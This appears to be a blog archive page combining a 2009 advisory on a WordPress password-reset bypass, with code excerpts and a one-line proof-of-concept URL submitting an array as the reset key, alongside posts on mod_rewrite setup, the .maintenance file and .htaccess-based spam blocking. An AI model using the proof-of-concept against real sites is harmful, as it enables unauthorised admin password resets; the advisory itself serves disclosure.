II. BACKGROUND

WordPress is a state-of-the-art publishing platform with a focus on aesthetics, web standards, and usability. WordPress is both free and priceless at the same time. More simply, WordPress is what you use when you want to work with your blogging software, not fight it.
III. DESCRIPTION

The way WordPress handle a password reset looks like this: You submit your email adress or username via this form /wp-login.php?action=lostpassword ;
Wordpress send you a reset confirmation like that via email:

”
Someone has asked to reset the password for the following site and username. http://DOMAIN_NAME.TLD/wordpress
Username: admin
To reset your password visit the following address, otherwise just ignore this email and nothing will happen

http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag ”

You click on the link, and then WordPress reset your admin password, and sends you over another email with your new credentials.

Let’s see how it works:

wp-login.php:
…[snip]….
line 186:
function reset_password($key) {

global $wpdb;

$key = preg_replace(’/[^a-z0-9]/i’, ”, $key);

if ( empty( $key ) )

return new WP_Error(’invalid_key’, __(’Invalid key’));

$user = $wpdb->get_row($wpdb->prepare(”SELECT * FROM $wpdb->users WHERE user_activation_key = %s”, $key));

if ( empty( $user ) )

return new WP_Error(’invalid_key’, __(’Invalid key’)); …[snip]….
line 276:
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : ‘login’; $errors = new WP_Error();

if ( isset($_GET['key']) )

$action = ‘resetpass’;

// validate action so as to default to the login screen if ( !in_array($action, array(’logout’, ‘lostpassword’, ‘retrievepassword’, ‘resetpass’, ‘rp’, ‘register’, ‘login’)) && false === has_filter(’login_form_’ . $action) )

$action = ‘login’;
…[snip]….

line 370:

break;

case ‘resetpass’ :
case ‘rp’ :

$errors = reset_password($_GET['key']);

if ( ! is_wp_error($errors) ) {
wp_redirect(’wp-login.php?checkemail=newpass’);
exit();

}

wp_redirect(’wp-login.php?action=lostpassword&error=invalidkey’); exit();

break;
…[snip ]…

You can abuse the password reset function, and bypass the first step and then reset the admin password by submiting an array to the $key variable.

Source:

IV. PROOF OF CONCEPT

A web browser is sufficiant to reproduce this Proof of concept: http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]= The password will be reset without any confirmation.

V. BUSINESS IMPACT

An attacker could exploit this vulnerability to compromise the admin account of any wordpress/wordpress-mu <= 2.8.3

VI. SYSTEMS AFFECTED

All

VII. SOLUTION

No patch aviable for the moment.

VIII. REFERENCES

http://seclists.org/fulldisclosure/2009/Aug/0113.html

Incoming search terms:

• tar -xzf csf tgz CPANEL (1)
• wp-login php?action=resetpass login=admin key= (1)
• wp_login action wordpress (1)

This module is required by WordPress MU.

I tried to install a WordPress MU on my Ubuntu server with LAMP.

To install mod_rewrite, run command as below:
sudo a2enmod rewrite
There is still another issue for WordPress MU installation. It is need a smtp service to send password to registered user.

If you do not have a postfix server on your Ubuntu, you’d better install this server first. Otherwise you can not active your account and your WordPress MU.

Incoming search terms:

• install mod_rewrite ubuntu (4)
• how to restart smtp service on linux directadmin (2)
• how to install mod_rewrite ubuntu (2)
• install mod_rewrite on ubuntu (2)
• mod_rewrite ubuntu (2)
• install mod_rewrite centos (1)
• install mod_rewrite ubuntu post install (1)
• install the mod_rewrite (1)
• mod_rewrite directadmin (1)
• mod_rewrite module reinstall (1)

Sample content of .maintenance file:

<?php $upgrading = 1282258195; ?>

Just delete or rename that file and resume your update process, or you may want to restore your backup first and re-start the update process. Of course, check what cause the failed or incomplete update.

Incoming search terms:

• apache2 briefly unavailable for scheduled maintenance check back in a minute (1)
• directadmin svn (1)
• svn plesk windows (1)
• wordpress 3 briefly unavailable for scheduled maintenance check back in a minute (1)
• wordpress briefly unavailable for scheduled maintenance check back in a minute (1)

1. Install Akismet

This is the simple one that everyone does. Akismet comes bundled with WordPress by default and does a good job of picking up spam – for the average blogger, install Akismet and your spam problems will be sorted. The trouble is though, it just stops spam getting displayed, it doesn’t get to the root of the problem. That’s where this post comes in. We’ll start with some simple methods of stopping spam being displayed and then we’ll move onto stopping the spammers getting on your site in the first place.

2. reCAPTCHA

The reCAPTCHA plugin is one you’ve probably seen around on sites such as Facebook, Twitter and StumbleUpon. It isn’t just your average CAPTCHA (an image containing some letters that are designed so only humans can read them), it uses words from old books, so every time you enter a reCAPTCHA, you’re helping digitise books. At this point, you’re probably thinking but if I’m telling it what the words mean, does that mean I can enter anything? How does that stop spammers? The answer is simple – there are two words, one of which the CAPTCHA knows. The second, it doesn’t and you’re helping digitise it.

The plugin is simple to install, in 2.7+, just do a search for WP-reCAPTCHA and click install. You’ll need a key for the plugin to work, which you can get here. After you’ve done that, reCAPTCHA should appear on your comments’ page.

3. Ask your readers to do 1+1

The second plugin that we’re going to look at as a way of stopping spam being displaued is the ‘Math Comment Spam Protection‘ plugin. Using it, you can add a field to your blog’s comment box with a simple maths (or ‘math’ as they say in the States) question.

I’m not going to go into installing it here as there’s a comprehensive installation guide on the plugin’s website. You can see it in action on WordPress Hacks (image above).

4. Stop spam trackbacks

The final plugin that we’re going to look at is one by the same author who made the plugin above. The ‘Simple Trackback Validation‘ plugin checks if the IP address of the sender of the trackback is the same as the IP address that the trackback URL refers to, thus eliminating [lots]% of trackback spam as spammers won’t use bots running on infected machines. As the plugin’s page says, the plugin also “retrieves the web page located at the URL included in the trackback. If the page doesn’t a link to your blog, the trackback is considered to be spam. Since most trackback spammers do not set up custom web pages linking to the blogs they attack, this simple test will quickly reveal illegitimate trackbacks. Also, bloggers can be stopped abusing trackback by sending trackbacks with their blog software or webservices without having a link to the post.”

Like the ‘Math Comment Spam Protection’ plugin, there’s an installation guide on the plugin’s homepage.

5. Make users login to comment

This is something that probably won’t be a good idea for the majority of bloggers, but it will stop spam – make users login to be able to leave a comment and spammers will be stopped from commenting, but so will one time visitors. Just keep that in mind.

Under ‘Settings’. click ‘Discussion’ and then tick the box ‘Users must be registered and logged in to comment’. Then save changes and you’re done.

6. Ban spammers by IP

Now that we’ve stopped spam being displayed with the tips above, we’re going to move on to blocking spammers getting on your site in the first place. Something we’re going to be using extensively is the .htaccess file. A basic introduction that you should read first is here, and remember the golden rule of .htaccess – always have a backup. Further .htaccess reading is available here on CatsWhoCode and my own blog, WPShout.

In most situations, this tip wouldn’t be too much of a good idea; spammers will fake often their IP, but if there is one IP that is particularly bugging you, then the code below will block them from visiting your site – instert it into your .htaccess file in your blog’s root, changing the second line to include the IP that you wish to ban.

Order allow,deny
Deny from 100.100.100.
Allow from all

7. Ban spammers by IP, on a massive scale

You’ve blocked a single spammer. Well done. Now, with help from Perishable Press, you can block thousands of spammers – Jeff from Perishable has compiled a number of blacklists, from which you can pick and choose which you want to implement into your .htaccess file. The latest blacklists, the ‘fourth generation’ can be accessed below:

• ‘The Perishable Press 4G Blacklist’
• ‘4G Series: The Ultimate Referrer Blacklist, Featuring Over 8000 Banned Referrers‘
• ’4G Series: The Ultimate User-Agent Blacklist, Featuring Over 1200 Bad Bots’

8. Deny comment posting to no referrer requests

Another .htaccess trick and the final comment spam stopping technique we’re going to look at is denying comment posting to no referrer requests – in other words, if the comment isn’t actually coming from your site, then it gets blocked. Make sure you change the url in line four to your blog.

RewriteEngine On
RewriteCond %{REQUEST_METHOD} POST
RewriteCond %{REQUEST_URI} .wp-comments-post\.php*
RewriteCond %{HTTP_REFERER} !.*yourblog.com.* [OR]
RewriteCond %{HTTP_USER_AGENT} ^$
RewriteRule (.*) ^http://%{REMOTE_ADDR}/$ [R=301,L]

Source – WordPress Recipes.

9. Stop content theives

Spammers don’t just limit themselves to spamming your comments – often they’ll steal your content too. This next trick will stop spammers who steal your content via RSS. Once you’ve found a site stealing your content, first thing to do is find out the site’s IP address. A search for ‘ping [site name, ie catswhocode.com]‘ should give you a result. Once you’ve got that, head over to the offending site and find their RSS feed. Then, open up your .htaccess file and add the following lines:

RewriteEngine on
RewriteCond %{REMOTE_ADDR} ^69.16.226.12
RewriteRule ^(.*)$ http://newfeedurl.com/feed

Change the IP in line two with the IP of the offending site and the url in line three with the offending site’s feed.

Source - WPShout/ SEO Black Hat

10. Stop spammers stealing your images

Now that we’ve stopped spammers from stealing your content via RSS, now it is time to combat those who just copy and paste your articles onto their site. Yes, this isn’t technically stopping spam, but it is helping combat the spammers.

You’ve got two options if people are hotlinking your images – watermark or .htaccess. We’ll look at both, and I’ll leave you to decide which is better. First up, watermarking. The foolproof method is to watermark your images before you upload them, which you can do with some simple software – FastStone Photo Resizer is a great tool that I’d thoroughly recommend. What’s more, it’s free! The second option is to install phpThumb and create a shortcode that resizes and watermarks your image. Copy and paste the following code into your functions.php file, having uploaded phpThumb to your theme’s folder, uploaded a watermark and changed the URLs. You can also change the width that images will be resized to (it’s currently 590).

<?php function imageresizer( $atts, $content = null ) {
return ‘<img src=”/THEMEURL/phpthumb/phpThumb.php?src=’ . $content . ‘&w=590&amp;fltr[]=wmi|/images/watermark.gif|BR”  alt=”">’;
}
add_shortcode(‘img’, ‘imageresizer’); ?>

With the code integrated, now when uploading a picture, upload it in the normal way, then go into HTML mode and copy the image url, then delete the image and then paste the image URL between [img] and [/img].

Of course, you can also easily disable hotlinking by going into your .htaccess file and pasting the following (changing lines three and five – five will display and alternate image – send it to something blank, or perhaps an ad for your site?):

RewriteEngine on
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://(www\.)?yourdomain.com/.*$ [NC]
#RewriteRule \.(gif|jpg)$ – [F]
RewriteRule \.(gif|jpg)$ http://www.yourdomain.com/advert.jpg [R,L]

Wrapping up

So there we are. Ten lovely ways to stop spam in WordPress, in roughly 1323 words. Got any tips to share? Leave a comment below, of course!

Incoming search terms:

• wordpress stop spam (3)
• spam for wordpress (1)
• visitors wordpress searching for phpthumb php (1)
• wordpress block spam (1)